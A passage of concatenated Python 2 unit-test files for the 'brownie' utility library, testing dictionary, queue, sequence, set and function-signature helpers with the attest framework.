with Assert.raises(TypeError):
d.update(foo='bar')
class TestImmutableMultiDict(TestBase, ImmutableMultiDictTestMixin,
ImmutableDictTestMixin):
dict_class = ImmutableMultiDict
@test_if(GE_PYTHON_26)
def type_checking(self):
d = self.dict_class()
types = [dict, ImmutableDict, MultiDict]
for type in types:
Assert.isinstance(d, type), type
@test
def hashability(self):
d = self.dict_class({1: [2, 3]})
Assert(hash(d)) == hash(self.dict_class(d))
with Assert.raises(TypeError):
hash(self.dict_class({1: [[]]}))
class TestCombinedMultiDict(TestBase, CombinedDictTestMixin,
ImmutableMultiDictTestMixin,
ImmutableDictTestMixin):
dict_class = CombinedMultiDict
# we don't need this special kind of initalization
init_with_lists = None
@test
def getlist(self):
d = self.dict_class()
Assert(d.getlist(1)) == []
d = self.dict_class([MultiDict({1: 2}), MultiDict({1: 3})])
Assert(d.getlist(1)) == [2, 3]
@test
def lists(self):
d = self.dict_class([
MultiDict({'foo': ['bar', 'baz']}),
MultiDict({'foo': ['spam', 'eggs']})
])
Assert(list(d.iterlists())) == d.lists()
Assert(d.lists()) == [('foo', ['bar', 'baz', 'spam', 'eggs'])]
@test
def listvalues(self):
d = self.dict_class([
MultiDict({'foo': ['bar', 'baz']}),
MultiDict({'foo': ['spam', 'eggs']})
])
Assert(list(d.iterlistvalues())) == d.listvalues()
Assert(d.listvalues()) == [['bar', 'baz', 'spam', 'eggs']]
@test
def multi_items(self):
d = self.dict_class([
MultiDict({'foo': ['bar', 'baz']}),
MultiDict({'foo': ['spam', 'eggs']})
])
Assert(list(d.iteritems(multi=True))) == d.items(multi=True)
Assert(d.items(multi=True)) == [
('foo', ['bar', 'baz', 'spam', 'eggs'])
]
@test
def item_accessor_equality(self):
CombinedDictTestMixin.item_accessor_equality(self)
d = self.dict_class([
MultiDict({'foo': ['bar', 'baz']}),
MultiDict({'foo': ['spam', 'eggs']})
])
Assert(d.values()) == [d['foo']]
Assert(d.lists()) == [(key, d.getlist(key)) for key in d]
Assert(d.items()) == [(k, vs[0]) for k, vs in d.lists()]
@test_if(GE_PYTHON_26)
def type_checking(self):
types = [dict, ImmutableDict, MultiDict, ImmutableMultiDict]
d = self.dict_class()
for type in types:
Assert.isinstance(d, type), type
class OrderedDictTestMixin(object):
dict_class = None
@test
def fromkeys_is_ordered(self):
d = self.dict_class.fromkeys([1, 2])
Assert(d.items()) == [(1, None), (2, None)]
d = self.dict_class.fromkeys([1, 2], 'foo')
Assert(d.items()) == [(1, 'foo'), (2, 'foo')]
@test
def init_keeps_ordering(self):
Assert(self.dict_class([(1, 2), (3, 4)]).items()) == [(1, 2), (3, 4)]
@test
def setitem_order(self):
d = self.dict_class()
d[1] = 2
d[3] = 4
Assert(d.items()) == [(1, 2), (3, 4)]
@test
def setdefault_order(self):
d = self.dict_class()
d.setdefault(1)
d.setdefault(3, 4)
Assert(d.items()) == [(1, None), (3, 4)]
@test
def pop_does_not_keep_ordering(self):
d = self.dict_class([(1, 2), (3, 4)])
d.pop(3)
d[5] = 6
d[3] = 4
modified = self.dict_class([(1, 2), (5, 6), (3, 4)])
Assert(d) == modified
@test
def popitem(self):
d = self.dict_class([(1, 2), (3, 4), (5, 6)])
Assert(d.popitem()) == (5, 6)
Assert(d.popitem(last=False)) == (1, 2)
@test
def move_to_end(self):
d = self.dict_class([(1, 2), (3, 4), (5, 6)])
d.move_to_end(1)
Assert(d.items()) == [(3, 4), (5, 6), (1, 2)]
d.move_to_end(5, last=False)
Assert(d.items()) == [(5, 6), (3, 4), (1, 2)]
@test
def update_order(self):
d = self.dict_class()
d.update([(1, 2), (3, 4)])
items = Assert(d.items())
items == [(1, 2), (3, 4)]
@test
def clear_does_not_keep_ordering(self):
d = self.dict_class([(1, 2), (3, 4)])
d.clear()
d.update([(3, 4), (1, 2)])
Assert(d.items()) == [(3, 4), (1, 2)]
@test
def repr(self):
d = self.dict_class()
Assert(repr(d)) == '%s()' % d.__class__.__name__
original = [(1, 2), (3, 4)]
d = self.dict_class(original)
Assert(repr(d)) == '%s(%s)' % (d.__class__.__name__, repr(original))
class TestOrderedDict(TestBase, OrderedDictTestMixin, DictTestMixin):
dict_class = OrderedDict
@test_if(GE_PYTHON_26)
def type_checking(self):
d = self.dict_class()
Assert.isinstance(d, dict)
class ImmutableOrderedDictTextMixin(OrderedDictTestMixin):
update_order = setitem_order = setdefault_order = \
pop_does_not_keep_ordering = clear_does_not_keep_ordering = None
@test
def popitem(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.popitem()
d = self.dict_class([(1, 2)])
with Assert.raises(TypeError):
d.popitem()
@test
def move_to_end(self):
d = self.dict_class([(1, 2), (3, 4)])
with Assert.raises(TypeError):
d.move_to_end(1)
class TestImmutableOrderedDict(TestBase, ImmutableOrderedDictTextMixin,
ImmutableDictTestMixin):
dict_class = ImmutableOrderedDict
@test_if(GE_PYTHON_26)
def type_checking(self):
d = self.dict_class()
Assert.isinstance(d, OrderedDict)
Assert.isinstance(d, ImmutableDict)
Assert.isinstance(d, dict)
@test
def hashability(self):
d = self.dict_class([(1, 2), (3, 4)])
Assert(hash(d)) == hash(self.dict_class(d))
Assert(hash(d)) != hash(self.dict_class(reversed(d.items())))
with Assert.raises(TypeError):
hash(self.dict_class(foo=[]))
class TestOrderedMultiDict(TestBase, OrderedDictTestMixin, MultiDictTestMixin,
DictTestMixin):
dict_class = OrderedMultiDict
@test_if(GE_PYTHON_26)
def type_checking(self):
d = self.dict_class()
types = [dict, MultiDict, OrderedDict]
for type in types:
Assert.isinstance(d, type), type
class TestImmutableOrderedMultiDict(TestBase, ImmutableOrderedDictTextMixin,
ImmutableMultiDictTestMixin,
ImmutableDictTestMixin):
dict_class = ImmutableOrderedMultiDict
@test_if(GE_PYTHON_26)
def type_checking(self):
d = self.dict_class()
types = [dict, ImmutableDict, MultiDict, ImmutableMultiDict,
OrderedDict]
for type in types:
Assert.isinstance(d, type), type
class TestFixedDict(TestBase, DictTestMixin):
dict_class = FixedDict
@test
def setitem(self):
d = self.dict_class()
d[1] = 2
Assert(d[1]) == 2
with Assert.raises(KeyError):
d[1] = 3
@test
def update(self):
d = self.dict_class()
d.update({1: 2})
Assert(d[1]) == 2
with Assert.raises(KeyError):
d.update({1: 3})
class TestCounter(TestBase):
@test
def missing(self):
c = Counter()
Assert(c['a']) == 0
@test
def get(self):
c = Counter('a')
Assert(c.get('a')) == 1
Assert(c.get('b')) == 0
@test
def setdefault(self):
c = Counter('a')
Assert(c.setdefault('a', 2)) == 1
Assert(c['a']) == 1
Assert(c.setdefault('b')) == 1
Assert(c['b']) == 1
@test
def most_common(self):
c = Counter('aababc')
result = [('a', 3), ('b', 2), ('c', 1)]
Assert(c.most_common()) == result
Assert(c.most_common(2)) == result[:-1]
Assert(c.most_common(1)) == result[:-2]
Assert(c.most_common(0)) == []
@test
def elements(self):
c = Counter('aababc')
for element in c:
Assert(list(c.elements()).count(element)) == c[element]
@test
def update(self):
c = Counter()
c.update('aababc')
Assert(c) == Counter('aababc')
c.update({'b': 1})
Assert(c['b']) == 3
c.update(c=2)
Assert(c['c']) == 3
@test
def add(self):
c = Counter('aababc')
new = c + c
Assert(new['a']) == 6
Assert(new['b']) == 4
Assert(new['c']) == 2
@test
def mul(self):
c = Counter('abc')
Assert(c * 2) == c + c
@test
def sub(self):
c = Counter('aababc')
assert not c - c
@test
def or_and(self):
c1 = Counter('abc')
new = c1 | c1 * 2
Assert(new.values()) == [2] * 3
new = c1 & c1 * 2
Assert(new.values()) == [1] * 3
tests = Tests([
TestImmutableDict, TestCombinedDict, TestMultiDict, TestImmutableMultiDict,
TestCombinedMultiDict, TestOrderedDict, TestOrderedMultiDict,
TestImmutableOrderedDict, TestImmutableOrderedMultiDict, TestFixedDict,
TestCounter
])
########NEW FILE########
__FILENAME__ = queues
# coding: utf-8
"""
brownie.tests.datastructures.queues
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.datastructures.queues`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
from threading import Thread
from attest import Tests, TestBase, test, Assert
from brownie.datastructures import SetQueue
class TestSetQueue(TestBase):
@test
def ordering_behaviour(self):
class QueuedItem(object):
def __init__(self, a, b):
self.a, self.b = a, b
@property
def _key(self):
return self.a, self.b
def __eq__(self, other):
return self._key == other._key
def __ne__(self, other):
return self._key != other._key
def __hash__(self):
return hash(self._key)
foo = QueuedItem('foo', 'bar')
bar = QueuedItem('foo', 'bar')
item_list = [
foo,
foo,
foo,
foo,
bar,
bar,
foo,
foo,
foo,
bar,
bar,
bar,
foo,
foo,
foo,
foo,
bar,
bar
]
item_set = set(item_list)
queue = SetQueue()
for item in item_list:
queue.put(item)
def item_consumer(tasks):
item_list = []
while True:
try:
item = tasks.get(timeout=0.2)
item_list.append(item)
tasks.task_done()
except queue.Empty:
break
Assert(len(item_list)) == 2
Assert(set(item_list)) == item_set
Assert(item_list[0]) == foo
Assert(item_list[1]) == bar
consumer = Thread(target=item_consumer, args=(queue, ))
consumer.start()
consumer.join()
tests = Tests([TestSetQueue])
########NEW FILE########
__FILENAME__ = sequences
# coding: utf-8
"""
brownie.tests.datastructures.sequences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.datastructures.sequences`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import sys
import pickle
import random
from StringIO import StringIO
from itertools import repeat
from contextlib import contextmanager
from attest import Tests, TestBase, test, Assert
from brownie.datastructures import (LazyList, CombinedSequence, CombinedList,
namedtuple)
@contextmanager
def capture_output():
stdout, stderr = sys.stdout, sys.stderr
sys.stdout, sys.stdout = StringIO(), StringIO()
try:
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = stdout, stderr
class TestLazyList(TestBase):
def _genrange(self, *args):
"""xrange() implementation which doesn't have like a sequence."""
if len(args) == 1:
start = 0
stop = args[0]
step = 1
elif len(args) == 2:
start, stop = args
step = 1
elif len(args) == 3:
start, stop, step = args
else:
raise ValueError()
i = start
while i < stop:
yield i
i += step
@test
def _test_genrange(self):
tests = [
(10, ),
(10, 20),
(10, 20, 2)
]
for test in tests:
Assert(list(self._genrange(*test))) == range(*test)
@test
def factory(self):
foo = LazyList.factory(xrange)
Assert(foo(10).__class__).is_(LazyList)
Assert(foo(10)) == range(10)
@test
def exhausted(self):
l = LazyList(range(10))
Assert(l.exhausted) == True
l = LazyList(self._genrange(10))
Assert(l.exhausted) == False
l[-1]
Assert(l.exhausted) == True
@test
def iteration(self):
for l in [range(10), self._genrange(10)]:
l = LazyList(l)
result = []
for item in l:
result.append(item)
Assert(result) == range(10)
@test
def append(self):
data = self._genrange(10)
l = LazyList(data)
l.append(10)
Assert(l.exhausted) == False
Assert(l) == range(11)
@test
def extend(self):
data = self._genrange(10)
l = LazyList(data)
l.extend(range(10, 20))
Assert(l.exhausted) == False
Assert(l) == range(10) + range(10, 20)
@test
def insert(self):
data = self._genrange(10)
l = LazyList(data)
l.insert(5, 'foobar')
Assert(l[5]) == 'foobar'
Assert(l.exhausted) == False
l.insert(-3, 'spam')
Assert(l[-4]) == 'spam'
@test
def pop(self):
data = xrange(10)
l = LazyList(data)
Assert(l.pop()) == 9
Assert(l.pop(0)) == 0
@test
def remove(self):
data = range(10)
l = LazyList(self._genrange(10))
data.remove(2)
l.remove(2)
Assert(l.exhausted) == False
Assert(l) == data
with Assert.raises(ValueError):
l.remove('foo')
@test
def reverse(self):
data = range(10)
l = LazyList(reversed(data))
l.reverse()
Assert(l) == data
@test
def sort(self):
data = range(10)
random.choice(data)
l = LazyList(data)
l.sort()
data.sort()
Assert(l) == data
@test
def count(self):
l = LazyList(['a', 'b', 'c', 'a'])
tests = [('a', 2), ('b', 1), ('c', 1)]
for test, result in tests:
Assert(l.count(test)) == result
@test
def index(self):
l = LazyList(self._genrange(10))
Assert(l.index(5)) == 5
with Assert.raises(ValueError):
l.index('foo')
@test
def getitem(self):
data = range(10)
l = LazyList(data)
for a, b in zip(data, l):
Assert(a) == b
l = LazyList(self._genrange(10))
l[5]
Assert(l.exhausted) == False
l = LazyList(self._genrange(10))
Assert(l[-1]) == 9
@test
def getslice(self):
data = range(10)
l = LazyList(self._genrange(10))
Assert(data[3:6]) == l[3:6]
Assert(l.exhausted) == False
l = LazyList(self._genrange(10))
Assert(data[:-1]) == l[:-1]
@test
def setitem(self):
data = ['foo', 'bar', 'baz']
l = LazyList(iter(data))
l[0] = 'spam'
Assert(l.exhausted) == False
Assert(l[0]) == 'spam'
Assert(l) != data
@test
def setslice(self):
data = range(10)
replacement = ['foo', 'bar', 'baz']
l = LazyList(self._genrange(10))
l[3:6] = replacement
data[3:6] = replacement
Assert(l.exhausted) == False
Assert(l) == data
@test
def delitem(self):
data = range(10)
l = LazyList(data[:])
del data[0]
del l[0]
Assert(l) == data
l = LazyList(self._genrange(10))
del l[2]
Assert(l.exhausted) == False
@test
def delslice(self):
data = range(10)
l = LazyList(self._genrange(10))
del data[3:6]
del l[3:6]
Assert(l.exhausted) == False
Assert(l) == data
@test
def len(self):
Assert(len(LazyList(range(10)))) == 10
l = LazyList([])
Assert(len(l)) == 0
l.append(1)
Assert(len(l)) == 1
l.extend([2, 3])
Assert(len(l)) == 3
l.pop()
Assert(len(l)) == 2
del l[1]
Assert(len(l)) == 1
@test
def contains(self):
l = LazyList(self._genrange(10))
Assert(5).in_(l)
Assert('foo').not_in(l)
class Foo(object):
def __eq__(self, other):
raise ValueError()
l = LazyList([Foo()])
with Assert.raises(ValueError):
Assert(1).not_in(l)
@test
def equals(self):
Assert(LazyList(range(10))) == range(10)
Assert(LazyList(range(10))) == LazyList(range(10))
Assert(LazyList(range(10)) != range(10)) == False
Assert(LazyList(range(10)) != range(10)) == False
Assert(LazyList(range(10)) == range(20)) == False
Assert(LazyList(range(10)) == LazyList(range(20))) == False
Assert(LazyList(range(10))) != range(20)
Assert(LazyList(range(10))) != range(20)
l = LazyList(self._genrange(10))
Assert(l == range(20)) == False
@test
def boolean(self):
Assert(bool(LazyList([]))) == False
Assert(bool(LazyList([1]))) == True
@test
def lower_greater_than(self):
Assert(LazyList([]) < LazyList([])) == False
Assert(LazyList([]) > LazyList([])) == False
tests = [
([], [1]),
([1], [2]),
([1, 2], [2, 1]),
([2, 1], [2, 2])
]
for a, b in tests:
Assert(LazyList(a) < LazyList(b)) == True
Assert(LazyList(a) > LazyList(b)) == False
Assert(LazyList(b) < LazyList(a)) == False
Assert(LazyList(b) > LazyList(a)) == True
a = LazyList(iter([1, 2, 3]))
b = LazyList(iter([1, 3, 3]))
Assert(a) < b
Assert(b) > a
Assert(LazyList([1, 2])) < [1, 2, 3]
Assert(LazyList([1, 2, 3])) > [1, 2]
@test
def add(self):
Assert(LazyList([1, 2]) + [3, 4]) == LazyList([1, 2, 3, 4])
Assert(LazyList([1, 2]) + LazyList([3, 4])) == LazyList([1, 2, 3, 4])
@test
def inplace_add(self):
old = l = LazyList([1, 2])
l += [3, 4]
l += (5, 6)
Assert(l) == LazyList([1, 2, 3, 4, 5, 6])
Assert(l).is_(old)
@test
def multiply(self):
a = LazyList(self._genrange(10))
b = range(10)
Assert(a * 5) == b * 5
@test
def inplace_multiply(self):
old = a = LazyList(self._genrange(10))
b = range(10)
a *= 5
b *= 5
Assert(a) == b
Assert(a).is_(old)
@test
def repr(self):
Assert(repr(LazyList([]))) == '[]'
data = range(10)
l = LazyList(self._genrange(10))
Assert(repr(l)) == '[...]'
l[1]
Assert(repr(l)) == '[0, 1, ...]'
l[-1]
Assert(repr(l)) == repr(data)
@test
def picklability(self):
l = LazyList(self._genrange(10))
pickled = pickle.loads(pickle.dumps(l))
Assert(pickled) == l
Assert(pickled.__class__) == l.__class__
class CombinedSequenceTestMixin(object):
sequence_cls = None
@test
def at_index(self):
foo = [1, 2, 3]
bar = [4, 5, 6]
s = self.sequence_cls([foo, bar])
for iterator in xrange(len(s) - 1), xrange(0, -len(s), -1):
for i in iterator:
list, index = s.at_index(i)
if 0 <= i <= 2 or -6 <= i <= -3:
Assert(list).is_(foo)
Assert(foo[index]) == s[i]
else:
Assert(list).is_(bar)
Assert(bar[index]) == s[i]
@test
def getitem(self):
s = self.sequence_cls([[0, 1, 2], [3, 4, 5]])
for a, b, item in zip(xrange(len(s) - 1), xrange(-len(s)), range(6)):
Assert(s[a]) == s[b] == item
@test
def getslice(self):
s = self.sequence_cls([[0, 1, 2], [3, 4, 5]])
Assert(s[:]) == range(6)
Assert(s[:3]) == s[:-3] == [0, 1, 2]
Assert(s[3:]) == s[-3:] == [3, 4, 5]
Assert(s[2:]) == [2, 3, 4, 5]
Assert(s[-2:]) == [4, 5]
@test
def len(self):
tests = [
([], 0),
([[]], 0),
([[], []], 0),
([[1, 2], [3, 4]], 4)
]
for args, result in tests:
Assert(len(self.sequence_cls(args))) == result
@test
def iteration(self):
s = self.sequence_cls([[0, 1, 2], [3, 4, 5]])
for expected, item in zip(range(6), s):
Assert(expected) == item
for expected, item in zip(range(5, 0, -1), reversed(s)):
Assert(expected) == item
@test
def equality(self):
s = self.sequence_cls([[0, 1, 2], [3, 4, 5]])
Assert(s) == self.sequence_cls(s.sequences)
Assert(s) != self.sequence_cls([[]])
@test
def picklability(self):
s = self.sequence_cls([[0, 1, 2], [3, 4, 5]])
pickled = pickle.loads(pickle.dumps(s))
Assert(pickled) == s
Assert(pickled.__class__).is_(self.sequence_cls)
@test
def multiplication(self):
s = self.sequence_cls([[0, 1, 2], [3, 4, 5]])
Assert(s * 2) == 2 * s == [0, 1, 2, 3, 4, 5] * 2
with Assert.raises(TypeError):
s * []
class TestCombinedSequence(TestBase, CombinedSequenceTestMixin):
sequence_cls = CombinedSequence
class TestCombinedList(TestBase, CombinedSequenceTestMixin):
sequence_cls = CombinedList
@test
def count(self):
s = self.sequence_cls([[1, 1, 2], [3, 1, 4]])
Assert(s.count(1)) == 3
Assert(s.count(2)) == s.count(3) == s.count(4) == 1
@test
def index(self):
s = self.sequence_cls([[1, 1, 2], [3, 1, 4]])
Assert(s.index(1)) == 0
Assert(s.index(1, 1)) == 1
Assert(s.index(1, 2)) == 4
with Assert.raises(ValueError):
s.index(1, 2, 3)
@test
def setitem(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
s[0] = 'foo'
Assert(s[0]) == foo[0] == 'foo'
@test
def setslice(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
s[:3] = 'abc'
Assert(s) == ['a', 'b', 'c', 3, 4, 5]
Assert(foo) == ['a', 'b', 'c']
s[::2] = repeat(None)
Assert(s) == [None, 'b', None, 3, None, 5]
@test
def delitem(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
del s[0]
Assert(s) == [1, 2, 3, 4, 5]
Assert(foo) == [1, 2]
@test
def delslice(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
del s[2:4]
Assert(s) == [0, 1, 4, 5]
Assert(foo) == [0, 1]
Assert(bar) == [4, 5]
@test
def append(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
s.append(6)
Assert(s[-1]) == bar[-1] == 6
@test
def extend(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
s.extend([6, 7])
Assert(s[-2:]) == bar[-2:] == [6, 7]
@test
def insert(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
s.insert(1, 6)
Assert(s[:4]) == foo == [0, 6, 1, 2]
Assert(bar) == [3, 4, 5]
@test
def pop(self):
s = self.sequence_cls([])
with Assert.raises(IndexError):
s.pop()
s = self.sequence_cls([[0, 1, 2]])
with Assert.raises(IndexError):
s.pop(3)
Assert(s.pop()) == 2
Assert(s.pop(0)) == 0
@test
def remove(self):
s = self.sequence_cls([])
with Assert.raises(ValueError):
s.remove(1)
s = self.sequence_cls([[1, 1]])
s.remove(1)
Assert(s) == [1]
s = self.sequence_cls([[1, 2], [1, 2]])
s.remove(1)
Assert(s) == [2, 1, 2]
s = self.sequence_cls([[2], [1, 2]])
s.remove(1)
Assert(s) == [2, 2]
@test
def reverse(self):
foo, bar = [1, 2, 3], [4, 5, 6]
s = self.sequence_cls([foo, bar])
s.reverse()
Assert(s) == [6, 5, 4, 3, 2, 1]
Assert(foo) == [6, 5, 4]
Assert(bar) == [3, 2, 1]
@test
def sort(self):
foo, bar = [3, 1, 2], [4, 6, 5]
s = self.sequence_cls([foo, bar])
s.sort()
Assert(s) == [1, 2, 3, 4, 5, 6]
Assert(foo) == [1, 2, 3]
Assert(bar) == [4, 5, 6]
class TestNamedTuple(TestBase):
@test
def docstring(self):
nt = namedtuple('foo', 'foo bar')
Assert(nt.__doc__) == 'foo(foo, bar)'
nt = namedtuple('foo', 'foo bar', doc='hello user')
Assert(nt.__doc__) == 'hello user'
@test
def string_field_names(self):
nt = namedtuple('foo', 'foo bar')
Assert(nt._fields) == ('foo', 'bar')
nt = namedtuple('foo', 'foo,bar')
Assert(nt._fields) == ('foo', 'bar')
@test
def typename(self):
nt = namedtuple('foo', [])
Assert(nt.__name__) == 'foo'
with Assert.raises(ValueError):
namedtuple('def', [])
@test
def fieldnames(self):
with Assert.raises(ValueError):
nt = namedtuple('foo', ['foo', 'bar', 'def'])
with Assert.raises(ValueError):
nt = namedtuple('foo', ['foo', 'bar', 'foo'])
nt = namedtuple('foo', ['spam', 'eggs'])
Assert(nt._fields) == ('spam', 'eggs')
nt = namedtuple('foo', ['foo', 'bar', 'def'], rename=True)
Assert(nt._fields) == ('foo', 'bar', '_1')
Assert(nt(1, 2, 3)._1) == 3
nt = namedtuple('foo', ['foo', 'bar', 'foo'], rename=True)
Assert(nt._fields) == ('foo', 'bar', '_1')
Assert(nt(1, 2, 3)._1) == 3
@test
def renaming(self):
nt = namedtuple('foo', ['foo', 'foo', 'foo'], rename=True)
t = nt(1, 2, 3)
Assert(t.foo) == 1
Assert(t._1) == 2
Assert(t._2) == 3
@test
def repr(self):
nt = namedtuple('foo', ['spam', 'eggs'])
Assert(nt(1, 2)) == (1, 2)
Assert(repr(nt(1, 2))) == 'foo(spam=1, eggs=2)'
@test
def _make(self):
nt = namedtuple('foo', ['spam', 'eggs'])
Assert(nt._make((1, 2))) == (1, 2)
with Assert.raises(TypeError):
nt._make((1, 2, 3))
@test
def _asdict(self):
nt = namedtuple('foo', ['spam', 'eggs'])
Assert(nt(1, 2)._asdict()) == {'spam': 1, 'eggs': 2}
@test
def _replace(self):
nt = namedtuple('foo', ['spam', 'eggs'])
t = nt(1, 2)
Assert(t._replace(spam=3)) == (3, 2)
Assert(t._replace(eggs=4)) == (1, 4)
with Assert.raises(ValueError):
t._replace(foo=1)
@test
def verbose(self):
with capture_output() as (stdout, stderr):
namedtuple('foo', 'spam eggs', verbose=True)
assert not stderr.getvalue()
namespace = {}
exec stdout.getvalue() in namespace
Assert('foo').in_(namespace)
Assert(namespace['foo'].__name__) == 'foo'
Assert(namespace['foo']._fields) == ('spam', 'eggs')
tests = Tests([TestLazyList, TestCombinedSequence, TestCombinedList, TestNamedTuple])
########NEW FILE########
__FILENAME__ = sets
# coding: utf-8
"""
brownie.tests.datastructures.sets
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.datastructures.sets`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
from attest import Tests, TestBase, test, Assert
from brownie.datastructures import OrderedSet
class TestOrderedSet(TestBase):
@test
def length(self):
Assert(len(OrderedSet([1, 2, 3]))) == 3
@test
def contains(self):
s = OrderedSet([1, 2, 3])
for element in s:
Assert(element).in_(s)
Assert(4).not_in(s)
@test
def add(self):
s = OrderedSet()
s.add(1)
Assert(1).in_(s)
@test
def remove(self):
s = OrderedSet()
with Assert.raises(KeyError):
s.remove(1)
s.add(1)
s.remove(1)
@test
def discard(self):
s = OrderedSet()
s.discard(1)
s.add(1)
s.discard(1)
Assert(1).not_in(s)
@test
def pop(self):
s = OrderedSet()
with Assert.raises(KeyError):
s.pop()
s = OrderedSet([1, 2, 3])
Assert(s.pop()) == 3
Assert(s.pop(last=False)) == 1
@test
def clear(self):
s = OrderedSet([1, 2, 3])
s.clear()
assert not s
@test
def update(self):
s = OrderedSet()
s.update('abc')
Assert(s) == OrderedSet('abc')
@test
def copy(self):
s = OrderedSet('abc')
Assert(s.copy()) == s
Assert(s.copy()).is_not(s)
@test
def inplace_update(self):
old = s = OrderedSet()
with Assert.raises(TypeError):
s |= 'abc'
s |= OrderedSet('abc')
Assert(s) == OrderedSet('abc')
Assert(s).is_(old)
@test
def issub_super_set(self):
a = OrderedSet('abc')
b = OrderedSet('abcdef')
a.issubset(a)
a.issuperset(a)
a.issubset(a)
a.issuperset(a)
assert a <= a
assert a >= a
assert a <= b
assert b >= a
assert not (a < a)
assert not (a > a)
assert a < b
assert not (a > b)
@test
def union(self):
a = OrderedSet('abc')
b = OrderedSet('def')
Assert(a.union('def', 'ghi')) == OrderedSet('abcdefghi')
Assert(a | b) == OrderedSet('abcdef')
with Assert.raises(TypeError):
a | 'abc'
@test
def intersection(self):
a = OrderedSet('abc')
Assert(a.intersection('ab', 'a')) == OrderedSet('a')
Assert(a & OrderedSet('ab')) == OrderedSet('ab')
with Assert.raises(TypeError):
a & 'ab'
@test
def intersection_update(self):
old = s = OrderedSet('abc')
with Assert.raises(TypeError):
s &= 'ab'
s &= OrderedSet('ab')
Assert(s) == OrderedSet('ab')
Assert(s).is_(old)
@test
def difference(self):
a = OrderedSet('abc')
Assert(a.difference('abc')) == OrderedSet()
Assert(a.difference('a', 'b', 'c')) == OrderedSet()
Assert(a - OrderedSet('ab')) == OrderedSet('c')
with Assert.raises(TypeError):
a - 'abc'
@test
def difference_update(self):
s = OrderedSet('abcd')
s -= s
Assert(s) == OrderedSet()
old = s = OrderedSet('abcd')
s -= OrderedSet('abc')
with Assert.raises(TypeError):
s -= 'abc'
Assert(s) == OrderedSet('d')
Assert(s).is_(old)
@test
def symmetric_difference(self):
for a, b in [('abc', 'def'), ('def', 'abc')]:
OrderedSet(a).symmetric_difference(b) == OrderedSet(a + b)
OrderedSet(a) ^ OrderedSet(b) == OrderedSet(a + b)
OrderedSet(a).symmetric_difference(a + b) == OrderedSet(b)
OrderedSet(a) ^ OrderedSet(a + b) == OrderedSet(b)
with Assert.raises(TypeError):
OrderedSet('abc') ^ 'def'
@test
def symmetric_difference_update(self):
old = s = OrderedSet('abc')
s ^= OrderedSet('def')
Assert(s) == OrderedSet('abcdef')
Assert(s).is_(old)
with Assert.raises(TypeError):
s ^= 'ghi'
@test
def iteration(self):
s = OrderedSet([1, 2, 3])
Assert(list(s)) == [1, 2, 3]
Assert(list(reversed(s))) == [3, 2, 1]
@test
def equality(self):
a = OrderedSet([1, 2, 3])
b = OrderedSet([3, 2, 1])
Assert(a) == a
Assert(a) == set(b)
Assert(b) == b
Assert(b) == set(a)
Assert(a) != b
@test
def hashability(self):
with Assert.raises(TypeError):
hash(OrderedSet())
@test
def repr(self):
Assert(repr(OrderedSet())) == 'OrderedSet()'
s = OrderedSet([1, 2, 3])
Assert(repr(s)) == 'OrderedSet([1, 2, 3])'
tests = Tests([TestOrderedSet])
########NEW FILE########
__FILENAME__ = signature
# coding: utf-8
"""
brownie.tests.functional.signature
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :class:`brownie.functional.Signature`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import re
from attest import Tests, Assert, TestBase, test
from brownie.functional import Signature
class TestFromFunction(TestBase):
@test
def positionals(self):
func = lambda a, b, c: None
Assert(Signature.from_function(func)) == (['a', 'b', 'c'], [], None, None)
@test
def keyword_arguments(self):
func = lambda a=1, b=2, c=3: None
Assert(Signature.from_function(func)) == (
[], [('a', 1), ('b', 2), ('c', 3)], None, None
)
@test
def mixed_positionals_keyword_arguments(self):
func = lambda a, b, c=3: None
Assert(Signature.from_function(func)) == (
['a', 'b'], [('c', 3)], None, None
)
func = lambda a, b, c=3, d=4: None
Assert(Signature.from_function(func)) == (
['a', 'b'], [('c', 3), ('d', 4)], None, None
)
@test
def arbitary_positionals(self):
foo = lambda *foo: None
bar = lambda *bar: None
for func, name in [(foo, 'foo'), (bar, 'bar')]:
Assert(Signature.from_function(func)) == ([], [], name, None)
@test
def arbitary_keyword_arguments(self):
spam = lambda **spam: None
eggs = lambda **eggs: None
for func, name in [(spam, 'spam'), (eggs, 'eggs')]:
Assert(Signature.from_function(func)) == ([], [], None, name)
class TestBindArguments(TestBase):
@test
def arguments_no_args(self):
sig = Signature.from_function(lambda: None)
Assert(sig.bind_arguments()) == {}
with Assert.raises(ValueError) as exc:
sig.bind_arguments((1, ), {})
Assert(exc.args[0]) == 'expected at most 0 positional arguments, got 1'
tests = [
({'a': 1}, "got unexpected keyword argument '.'"),
({'a': 1, 'b': 2}, "got unexpected keyword arguments '.' and '.'"),
(
{'a': 1, 'b': 2, 'c': 3},
"got unexpected keyword arguments '.', '.' and '.'"
)
]
for kwargs, message in tests:
with Assert.raises(ValueError) as exc:
sig.bind_arguments(kwargs=kwargs)
err_msg = exc.args[0].obj
assert re.match(message, err_msg) is not None
for name in kwargs:
assert name in err_msg
@test
def arguments_only_positionals(self):
sig = Signature.from_function(lambda a, b, c: None)
Assert(sig.bind_arguments((1, 2, 3))) == dict(a=1, b=2, c=3)
